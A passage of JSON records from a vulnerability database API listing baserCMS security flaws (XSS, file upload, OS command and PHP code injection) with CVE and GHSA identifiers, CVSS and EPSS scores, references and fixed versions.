P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"}],"url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51450","reference_id":"CVE-2023-51450","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51450"},{"reference_url":"https://github.com/advisories/GHSA-77fc-4cv5-hmfr","reference_id":"GHSA-77fc-4cv5-hmfr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77fc-4cv5-hmfr"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr","reference_id":"GHSA-77fc-4cv5-hmfr","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69105?format=json","purl":"pkg:composer/baserproject/basercms@5.0.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID
-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"}],"aliases":["CVE-2023-51450","GHSA-77fc-4cv5-hmfr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52932?format=json","vulnerability_id":"VCID-vqx2-hzju-r7et","summary":"Cross-site Scripting\nbaserCMS is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected component is `toolbar.php`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15155","reference_id":"","reference_type":"","scores":[{"value":"0.00868","scoring_system":"epss","scoring_elements":"0.75527","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00868","scoring_system":"epss","scoring_elements":"0.75555","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15155"},{"reference_url":"https://basercms.net/security/20200827","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20200827"},{"reference_url":"https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f"},{"reference_url":"https
://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15155","reference_id":"CVE-2020-15155","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15155"},{"reference_url":"https://github.com/advisories/GHSA-4r3m-j6x5-48m3","reference_id":"GHSA-4r3m-j6x5-48m3","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4r3m-j6x5-48m3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/77910?format=json","purl":"pkg:composer/baserproject/basercms@4.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-
k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7"}],"aliases":["CVE-2020-15155","GHSA-4r3m-j6x5-48m3"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vqx2-hzju-r7et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53748?format=json","vulnerability_id":"VCID-wvnk-63hy-ykeq","summary":"Cross-site Scripting\nbaserCMS is vulnerable to Cross-Site Scripting. Arbitrary JavaScript may be executed by entering a specially crafted nickname in the blog comments. 
The issue affects the blog comment component.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15276","reference_id":"","reference_type":"","scores":[{"value":"0.00592","scoring_system":"epss","scoring_elements":"0.69606","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00592","scoring_system":"epss","scoring_elements":"0.69646","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15276"},{"reference_url":"https://basercms.net/security/20201029","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20201029"},{"reference_url":"https://github.com/baserproject/basercms/commit/d14f506385f21d67d5ff3462f204d4c2321b7c54","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/d14f506385f21d67d5ff3462f204d4c2321b7c54"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw5q-j9p4-3vxg","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw5q-j9p4-3vxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15276","reference_id":"CVE-2020-15276","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_sy
stem":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15276"},{"reference_url":"https://github.com/advisories/GHSA-fw5q-j9p4-3vxg","reference_id":"GHSA-fw5q-j9p4-3vxg","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fw5q-j9p4-3vxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/79034?format=json","purl":"pkg:composer/baserproject/basercms@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.1"}],"aliases":["CVE-2020-15276","GHSA-fw5q-j9p4-3vxg"],"risk_score":3.5,"exploitability":"0.5","w
eighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wvnk-63hy-ykeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54254?format=json","vulnerability_id":"VCID-xpsb-2yux-g3cf","summary":"Cross-site Scripting\nImproper neutralization of JavaScript input in the blog article editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20683","reference_id":"","reference_type":"","scores":[{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42402","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42327","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20683"},{"reference_url":"https://basercms.net/security/JVN64869876","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN64869876"},{"reference_url":"https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1"},{"reference_url":"https://jvn.jp/en/jp/JVN64869876/index.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://jvn.jp/en/jp/JVN6486
9876/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20683","reference_id":"CVE-2021-20683","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20683"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/80118?format=json","purl":"pkg:composer/baserproject/basercms@4.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5"}],"aliases":["CVE-2021-20683","GHSA-v9w8-hq92-v39m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xps
b-2yux-g3cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53746?format=json","vulnerability_id":"VCID-xxud-7jsh-bbc1","summary":"Unrestricted Upload of File with Dangerous Type\nIn baserCMS, code may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The `Edit template` component was found to be vulnerable.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15277","reference_id":"","reference_type":"","scores":[{"value":"0.03225","scoring_system":"epss","scoring_elements":"0.87299","published_at":"2026-06-04T12:55:00Z"},{"value":"0.03225","scoring_system":"epss","scoring_elements":"0.87321","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15277"},{"reference_url":"https://basercms.net/security/20201029","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20201029"},{"reference_url":"https://github.com/baserproject/basercms/commit/bb027c3967b0430adcff2d2fedbc23d39077563b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/bb027c3967b0430adcff2d2fedbc23d39077563b"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6fmv-q269-55cw","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https:/
/github.com/baserproject/basercms/security/advisories/GHSA-6fmv-q269-55cw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15277","reference_id":"CVE-2020-15277","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15277"},{"reference_url":"https://github.com/advisories/GHSA-6fmv-q269-55cw","reference_id":"GHSA-6fmv-q269-55cw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6fmv-q269-55cw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/79034?format=json","purl":"pkg:composer/baserproject/basercms@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerabili
ty":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.1"}],"aliases":["CVE-2020-15277","GHSA-6fmv-q269-55cw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xxud-7jsh-bbc1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90946?format=json","vulnerability_id":"VCID-y2sz-c6vb-pkdp","summary":"baserCMS Update Functionality Vulnerable to OS Command Injection\n### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション（baserCMSのアップデート機能）.pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running 
baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30877","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19955","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30877"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","sc
oring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30877","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30877"},{"reference_url":"https://github.com/advisories/GHSA-m9g7-rgfc-jcm7","reference_id":"GHSA-m9g7-rgfc-jcm7","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-m9g7-rgfc-jcm7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30877","GHSA-m9g7-rgfc-jcm7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38780?format=json","vulnerability_id":"VCID-y9f3-k7xk-rucf","summary":"Code Injection\nbaserCMS allows an attacker to execute arbitrary PHP code on the server via unspecified 
vectors.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN78151490/index.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN78151490/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10844","reference_id":"","reference_type":"","scores":[{"value":"0.00568","scoring_system":"epss","scoring_elements":"0.6893","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00568","scoring_system":"epss","scoring_elements":"0.68891","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10844"},{"reference_url":"https://basercms.net/security/JVN78151490","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN78151490"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10844","reference_id":"CVE-2017-10844","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10844"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/212595?format=json","purl":"pkg:composer/baserproject/basercms@4.0.5.1","is_vulnerable":tru
e,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-